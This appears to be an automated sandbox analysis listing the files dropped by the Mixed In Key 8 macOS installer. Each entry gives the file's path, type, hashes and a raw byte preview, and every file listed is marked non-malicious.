Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .j.e. .b.i.l. .u.s.p.e.a.n.o. .p.r.e.n.e.a.e.n. .s. .s.p.l.e.t.a. .i.n. .j.e. .p.r.i.p.r.a.v.l.j.e.n. .n.a. .n.a.m.e.s.t.i.t.e.v... .G.a. .~.e.l.i.t.e. .n.a.m.e.s.t.i.t.i. .i.n. .p.o.n.o.v.n.o. .z.a.g.n.a.t.i. .t.a.k.o.j.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".P.r.o.g.r.a.m.a. .%.1.$.@. .n.i. .m.o.g.o...e. .p.o.s.o.d.o.b.i.t.i.,. .k.e.r. .g.a. .p.o.g.a.n.j.a.t.e. .i.z. .l.o.k.a.c.i.j.e.,. .k.a.m.o.r. .p.i.s.a.n.j.e. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/sv.lproj/.BC.T_AaLvFH Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3376
Entropy (8bit):	4.898536554281551
Encrypted:	false
SSDEEP:	96:PnXNM63U8ARPLhuMLSLJOT8LwjLPZCpzEON8ToMWIZf:fX53U1PLh5LSLcT8LwjL0z0ff
MD5:	19CFEBADD873E045E4DC4BF5B8506FB1
SHA1:	0BD0E287DBAD7DC9D41B46D059F2AA8CC210E42E
SHA-256:	BB9593FD660C05BEDC7DEB9E190C68FA51ADCEA0C8F37107930B1B17BE26C0E5
SHA-512:	0CE7256082EF3C415B592D43FE7225F80C1DA6C221C167AAD76114A27AFED333CD35232C15639B0912CFEFCC74872B8D588DC94CA965DEC0C2EBD84C3C25C6E6
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah ralddta sen dco h.. rlkraa tta vn..dn!aV li ludi snatllre aed tco htsraat% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nnietu ppadetar s.nr.d tek ..srf .rn.e nksirsvykdddav lomys moe nksvivaibdle llree npoitkse hnte .lFtyat% $1 @itllm paep nrPgoar,ms attr amod ned ..irrf..,no hcf ..sr.. kgine"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. r.f .. r.nr.avardn eed nesants eitll.gn.lggi aevsroien.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. r.n uitll.gn.lggi..d. uah r3%@$ .iVlld ualdd aen dun"?.;".@%d wolnaoed"d= " @%n dealddta;"..%" @fo% "@= " 1%@$a v2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa v@%f nisnt ligl..gnil!g

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/th.lproj/.BC.T_GwygM6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	5916
Entropy (8bit):	5.025902622174575
Encrypted:	false
SSDEEP:	96:PkMBEAL7MNoQHVAUw8ciiPILNk6ILJOiM8c3Wr8ILPOG0oFFoJNXI+DuFYo4lE3Y:+uAoQS8v2ILVILcf8mILFZFojy4lE3hq
MD5:	0C92DA23049E5A1346DD37553AC485A7
SHA1:	0C06662F184345576EED454EB471D590ADEBA2E9
SHA-256:	0BB6AC8645986AD5E03BCCD732B30525B7DCF507704C29C17DEBACF4BED3C33B
SHA-512:	3CF99C2ECD68A390A27B93F14CD4C9DD724C6B632A9B09A1CB05B2918404CEA6D75C046867D2D73B5D1EA0D19736105C0C8F76F35CD933E90ABDEFBCE14E1491
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @...................................................................................... ................................................................... .1%@$. ................................................"..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @...................................................................................................................................................................................... .........% $1 @............................................................... .................................... .........................................................;"..%" @@%i sucrrnelt y

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/tr.lproj/.BC.T_XueMAa Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4340
Entropy (8bit):	5.08681039554709
Encrypted:	false
SSDEEP:	96:Dy3xtj4ZEoz+ABiAt9Lhuu/9La9LJOx9L+9Lu9LPdhyrfE9K7IH7PO9n:Dy3xCZEoz+279Lhf9La9Lcx9L+9Lu9LK
MD5:	C6C97B845A2111FF482651A70310CC1A
SHA1:	976A2345D208145519C2AF1C4149C6C10775EABF
SHA-256:	CB792ECED2E4B941EF68CBC8B85091BE1D7F4CD344C7BB4CB31398BD35427304
SHA-512:	4A68BF9D332CEFBE41BC7EC3D78AD64FF5AA664FEDDB0E29D0193B45470D68D1EBA6903BA26AB80861B6148570A589DC884947992F9881DE70C1737C5C66A397
Malicious:	false
Preview:	../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$i dnriliidv eukllna..amh za..!r. i.dm i.yk.elem ksiitoy rumusun?zU gyluma aeyined nab..al.tl.caka.tr."..;/. edD_ E0v1.- N oocmmne trpvodideb yneigenre ./..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$u gylumasa..d si kak.lb...i ..resiniedkyneg ..cnleelenem.zL ..ftne% $1 @yuugalam.sn...U gylumalarad zinini eokyplaya.. peyined nab..al.tn....z;"../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$m veuc tney ne i.sr...dm...r;"../d _eEDv .0 1 -oNc moemtnp orived dybe gnniee.r ./".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @...tk..( uKllna.d..n... z.Sr...:m% $3)@ ...miidy ne i.sr....m .niidmrkei tsrem sinizi

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/uk.lproj/.BC.T_h2Q3h4 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	6696
Entropy (8bit):	4.156961851830748
Encrypted:	false
SSDEEP:	96:M4+At+bNwf43IiPleiK0MAZn/um3kDMGn2HWvurFIN2KC7nGLM274:MlKf43ICleirZ3khn2HWWiH42k
MD5:	2BBB283FC0806301EDAE390A28116EB2
SHA1:	84BE78941B29ADA51DCA8D09F062DB777E6344E6
SHA-256:	64914509A698B22799B06ACE0831B96A1023C3A9695A74308CD5ED4B4ED0FA01
SHA-512:	8A7E9845EDA6702122FC087ADFE84B3DC62782F1D5E94A2A59B34A6AFB488448E47E11D054F813E865EA2D400485AAF21CDD37A9FB2A7A16CC782BCA16158AED
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .7.0.2.0.=.B.0.6.5.=.8.9. .V. .3.>.B.>.2.8.9. .4.>. .2.8.:.>.@.8.A.B.0.=.=.O.!. ...0.6.0.T.B.5. .2.A.B.0.=.>.2.8.B.8. .V. .?.5.@.5.7.0.2.0.=.B.0.6.8.B.8. .%.1.$.@.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. ."...V.4. .G.0.A. .@.>.1.>.B.8. .7. .%.1.$.@. .7. .B.>.<.C.,. .I.>. .?.@.8.7.=.0.G.5.=.8.9. .;.8.H.5. .4.;.O. .G.8.B.0.=.=.O.,. .=.0.?.@.8.:.;.0.4.,. .>.1.@.0.7.C. .4.8.A.:.0. .G.8. .>.?.B.8.G.=.>.3.>. .4.8.A.:.C.,. .9.>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_CN.lproj/.BC.T_Dif3g6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3190
Entropy (8bit):	5.962955012702519
Encrypted:	false
SSDEEP:	96:PD67u3CiRps8tRnizzLas+IzLazLP/kEE6FNjq8RC0RZZf:bdp1tRizzLxzLazLHtJpTf
MD5:	09EC9B35B013F07C4086E2432DBCCE7F
SHA1:	0FDD932C1DD967D03E843AFBCB6EE72FF65467AB
SHA-256:	32DC66D14898CF2225877756CB29B110672FEAA18E31F3E3BB6E93434A9F1C4F
SHA-512:	E20E208EF35222F8FF59AD902A952807D6FF838CD6E234BC26C7E3B9BB90DFED0B1B62E50BD7D6C6092329BE8F6E12037C75944F908C7AC449DDD8438F742701
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @....................................% $1 @..?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ..................................................................% $1 @............................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @.................."..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @............................% $3.@...................."..;".@%d wolnaoed"d= " @%. ......;"..%" @fo% "@= " 1%@$/ % $2"@.;". Aen wevsroi nfo% @sia avlibael"!= " ........% @................;"..A"n wev reisnoo f@%i serda yoti snatll"!= " ........%

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/Resources/Autoupdate.app/Contents/Resources/zh_TW.lproj/.BC.T_2htfIe Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3096
Entropy (8bit):	5.999412604664841
Encrypted:	false
SSDEEP:	48:PFWDUhvOM9bpxT/nnRTj3iMxjLkG783sX83bUjSxB88fUkJGNicOqYGzemOPk:PHhDTvRTj3iCLB83ss3b2SbjsbNicEBM
MD5:	141F43A3CE5CB5DED83C83E0DA541F50
SHA1:	BC62DC9E9EFF199B40FC884B5CC0AF645EBC6753
SHA-256:	6C718D352F88367AA9AFDCD11FE60BC1D0BA89C405EF8F7509B22D8974546DF7
SHA-512:	E1C0FB4948F6DA3BC82EE4B49111339582689FD3DA778BE3623233CC9F83F90BF056954D36394B98BF745E45CF1FAC0BA7F8557A179FCFC4A085B54121EA02B7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @............................................1%@$.."..;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =."..% $1 @.............................................................. .1%@$. .......................................................... ;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @....................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ..........................% $3.@..................;"..%" @odnwoldade " =%" @......"..;".@%o f@% " =%"$1 @ /2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."............ .@%. ..........;"..A"n wev reis

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/XPCServices/com.andymatuschak.Sparkle.SandboxService.xpc/Contents/_CodeSignature/.BC.T_h7N3bP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	20623
Entropy (8bit):	5.1614882899514205
Encrypted:	false
SSDEEP:	192:XenNPoaPftJXdTWUH3/lro9r1qltpeEDzko:iF7FWS/ljDzd
MD5:	94458A3242733B30C0A45FD5491F2477
SHA1:	C0DC7571454B3EB6628C33C9E1A557738057FA73
SHA-256:	B51398D71DE090095D04082C09B2CF7339949452511397C36452E9371D1BEE45
SHA-512:	3D4FC017A318A2FB5E69577A2CE33CC2BA77BCFF495E69093369AF2482EA0CE1E01AEC72A5C6B5B5F31894F95A8BD5AD047590B2036DBEC41458F37B7A866B4B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Autoupdate.app/Contents/Info.plist</key>...<data>...O92EYJpsmyRV92gaoHI05SUu4Yw=...</data>...<key>Resources/Autoupdate.app/Contents/MacOS/Autoupdate</key>...<data>...Put3K+2mVWcE2eXPTJAqwD7qgLc=...</data>...<key>Resources/Autoupdate.app/Contents/PkgInfo</key>...<data>...n57qDP4tZfLD1rCS43W0B4LQjzE=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/SUStatus.nib</key>...<data>...sYsx+yJdk7U5jlaT5UjkYAO2vYY=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/Sparkle.icns</key>...<data>...RAPi1GDm7RjA+JlOSVD1eYK+1VA=...</data>...<key>Resources/Autoupdate.app/Contents/Resources/ar.lproj/Sparkle.strings</key>...<dict>....<key>hash</key>....<data>....3lN5msMrnMK9Fubf02YF5yyKp7U=....</data>....<key>optional</key>....<true/>...</dict>...<key>Resources/Autoupdate.a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/_CodeSignature/.BC.T_5fzi26 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	3399
Entropy (8bit):	5.145413299931296
Encrypted:	false
SSDEEP:	96:CyWJyEQqAaGvAZA9HBA+pkYT2BLDzFNQpO/YTbJvy:XGyaAneAPAGEDzko
MD5:	2D14690139D91C43CA58050C82F5E252
SHA1:	3C6F16AC3FCE219F16E50CEAFA4FB258F19C0A83
SHA-256:	DAEB80DB8E30804C6439A44FE5D7FDF9B680042ED8731B133BB1753083DF605E
SHA-512:	62327B47671A3A4D654109BECCD0B75531E7CE35381DC097128974A4279DCCE32CD70C6FD976DD38482C0B591956BC52A7D6E7611D68A287DF692394E53C71DE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...eIKZmx3v13Nmi4ejZNGESnMfL2A=...</data>..</dict>..<key>files2</key>..<dict>...<key>Frameworks/Sparkle.framework</key>...<dict>....<key>cdhash</key>....<data>....KGMqQXtU82gc9WsQXpse8j5TSLE=....</data>....<key>requirement</key>....<string>identifier "org.andymatuschak.Sparkle" and anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists / and certificate leaf[field.1.2.840.113635.100.6.1.13] / exists */ and certificate leaf[subject.OU] = T4A2E2DEM7</string>...</dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....eIKZmx3v13Nmi4ejZNGESnMfL2A=....</data>....<key>hash2</key>....<data>....zTd6Flq0y1kJteunMp6I7bBSePtwwVULrEq3BJmALnc=....</data>...</dict>...<key>XPCServices/com.andymatuschak.Sparkle.San

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/MacOS/.BC.T_HCcfBJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	1979920
Entropy (8bit):	6.18811551972665
Encrypted:	false
SSDEEP:	49152:yHz0MNKfRWPfI9wA1C7Q4ucDCZPGPXCBZ:AgRB
MD5:	78349859202DF2B3FE03DFCDDDFE1F33
SHA1:	4D5D157ABE44202B396305A9AA0C1A5F8E64B4C1
SHA-256:	6A7C5843439123FBEC749B43782634210F96A5F83D2B331EAE7E109A0C070C6F
SHA-512:	94ACD83181CD567028F5734D5FD584709DF15AE1F6EE27B5E2E28003054B24DABE4C1C2FD956360DDD209118E80583737120507B5A8F7A6EBA496A680709D1D9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	................<......... .........H...__PAGEZERO..........................................................8...__TEXT..........................................................__text..........__TEXT...........(...............(..............................__stubs.........__TEXT..........."..............."..............................__stub_helper...__TEXT..........\|,..............\|,..............................__objc_methname.__TEXT...........<....... .......<..............................__objc_classname__TEXT...........\...............\..............................__objc_methtype.__TEXT..........(l......./......(l..............................__cstring.......__TEXT........................................................__const.........__TEXT..........`........l......`...............................__gcc_except_tab__TEXT..........................................................__swift3_typeref__TEXT...........2.......>.......2..............................__swift3_assocty__TEXT..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_13bw9F Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=23, height=70, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=control-bar-gradient@2x.png, orientation=upper-left, width=100
Category:	dropped
Size (bytes):	9286
Entropy (8bit):	6.903055466470939
Encrypted:	false
SSDEEP:	192:wuiOXlBhkvpYNMtKwVc7N3iykvEYNMtKwy:ZRXlIRYNg7MNwMYNg7y
MD5:	73600D04D1653BD1CCA4DD6C64C14434
SHA1:	92FB838B830B6EBC3FE546A88F064D810C04046B
SHA-256:	E76CF859E911AA5B8806F6453A12BE466ED8AC60F68EDB42560D0C4003038269
SHA-512:	ABBC03CC83FB764F17DBD486938A1EFC06558A863C8C1F1325524889EA242A22BF5E77E3ADFD74294E3F968732F73CC04E691BD5F61D36FA0B1672C274A9E005
Malicious:	false
Preview:	MM..................>.......................d...........F....2016:07:01 14:42:36..9........BaP.d6...DbQ8.V-..FcQ...7..HdR9$.M'.Ge..d.]/.K.S...m7.J.s...}?.N..:%....Q.T.e..M.TjSJ}N.W.G..v.....V:...g.Q..e.sk.\nR...w..o...R.}.`aW......bo..V6..dm...V...fk...v...hiZ......jg..V.k..lfP=....nd{......pm.......rn..W6M..t`.'.K."q.#.~.g....b.'_...\|..d=..{{~P......}.......f..z@...r..+.l......g......oa.q.0..j.'.<.....F..wE...o..kd..(..n....h...t....}..&y.u.l.....$.2Z(f.2\|....+..Y.s.T.0L.1.k..+:..H..j..S.dN...d..$....... ...........d...........F.............>...............................................J...........R.................................F.....................................6.............(...........1.........f.2.........t.=...........S.........D.............i...........s.....H...P................................control-bar-gradient@2x.png.tiffutil v310.2016:07:01 14:44:52.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_1vBs2h Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	964
Entropy (8bit):	5.073251527930704
Encrypted:	false
SSDEEP:	24:4Rw2+HPDV/1WZNQGK6pC1Hx8Ar6y228hok7XtVyH:4dJZWWAHr6y2lhok7dkH
MD5:	FEF06E9513BD8CF8CE360E79BA771F6A
SHA1:	D429E3F159CE9ADDA733794D37B63FEE820525D9
SHA-256:	6C540CFA9C2E9C4342579ECB59B72B011B37F4588FEB016B725767371E09F54C
SHA-512:	AE5853D5169C256A2DC16E3163210CDDFD8B3140FCDF8A0BC379BD944A835550B1723CC368DEED17FCACD0FA2CC0FF79D8B27C9A71248D3D4287A3FAD5C1B903
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\cocoartf1561\cocoasubrtf600.{\fonttbl\f0\fnil\fcharset0 Roboto-Regular;\f1\fnil\fcharset0 Roboto-Medium;}.{\colortbl;\red255\green255\blue255;\red0\green32\blue78;}.{\*\expandedcolortbl;;\csgenericrgb\c0\c12549\c30588;}.\paperw11900\paperh16840\margl1440\margr1440\vieww19200\viewh15760\viewkind0.\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0..\f0\fs28 \cf2 Users of .\f1 Ableton Live.\f0 , .\f1 Traktor.\f0 , and other DJ programs should be careful when using File Renaming. Many DJ programs may store cue points and other metadata based on the original file name. When renamed, music files can lose this information and may even have to be reimported into your DJ software.\.\.If you use .\f1 iTunes.\f0 , you must disable the 'Keep iTunes Media Folder Organized' option in iTunes' advanced preferences. File renaming will not work until you change this setting.}

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_43eg6D Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 90 x 90, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1110
Entropy (8bit):	7.352757549179103
Encrypted:	false
SSDEEP:	24:uCqxmoTYXjxR3h/1i7SD1g7ypTYDXqAJ83eYD7wUnTPSrWEUE+eUds:u1mpnFKSYypTUzur/S/Ss
MD5:	2DD8D2CC77B426993DE3BBA0E11FF1CE
SHA1:	4033998BE97765CD933B1ED16BE3F8B058410BCF
SHA-256:	07B934F63520ACE8ED23B68CE2D3982583D8C8297A74771CC65A84FDABC91BF7
SHA-512:	09F50D8740D33242DBC1B0D6559732D9D710D233B1BA9E28A201B08AA70ABF5D7B26E4BC7F0A0E20291443021FDBB1E03CCD7F72EC361B6042354781C9C53C20
Malicious:	false
Preview:	.PNG........IHDR...Z...Z.....8.A.....bKGD.......C......pHYs...H...H.F.k>....vpAg...Z...Z...#F...2IDATx...Ir.a...O..........BH.x....'..B....,.5.PU.z.\...z+G+G..).....".0..sX...2.Xu.....O....X....X..@...B...Bv..#..Z..Md.B......h!;z...P.-dG.....Q.-dGo92.A...[..y.Bv..a.Z..8.a.Z...&.d....=.d.D....Fi..>......gR!.rr..O...D....b#.2.>.......5d0C..-d0A...d....+..P.-dWJ...Z.T C...]1 ....]1"....]q ....]q".$.D~Q+2@2L..AdH...M!G{....5......B...^...~oxM.E.@........I.l.7...B..[...kR!..-G..5....V#C....W.F..5iG..~.....kR!...!..T..{.....=...skR:..5)0..I...I...{.E.N.I.<2.~MJ/...kRz...]...7.A.V.I.?.{...[..Kdh..."Ck....Z.&.......A C.kR.....I..rCkR...lZ...A"...sM.,....j[..B.....82.&e..p.5)B.......u.].p.5)B.......r.5)....".A...$.Z."..`M....sM.,...=.d..co....5)Bv...?....{.....Bv......T..{d.@/..l..D.+...n>.J..X.....G.h!;z....Z..rd(..........!.6....vdX........Bv.....!{zc.........O.....%tEXtcreate-date.2016-07-15T14:54:08+00:00.J+...%tEXtmodify-date.2016-07-

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_6OLFtT Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=340, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=analysis-message@2x.png, orientation=upper-left, width=400
Category:	dropped
Size (bytes):	85030
Entropy (8bit):	7.946426330164176
Encrypted:	false
SSDEEP:	1536:ebN0fHk2hxGgRWIRJmmR9hAPYowTNgtJL3T7RUQfMy/JIIDbZUpW4K:EKfHrzGgRWIRwmR9O1wqtc8/JI6IK
MD5:	2AA6E3DEF55FAF02590EC9A5DA3B350B
SHA1:	135A47BC355470CDBE99FEBEE0E9FCAB5B6ABA7A
SHA-256:	12A1DB8E5286C1E54042AE5E407CB8EEE53B522190C01123F2885896E164CFFA
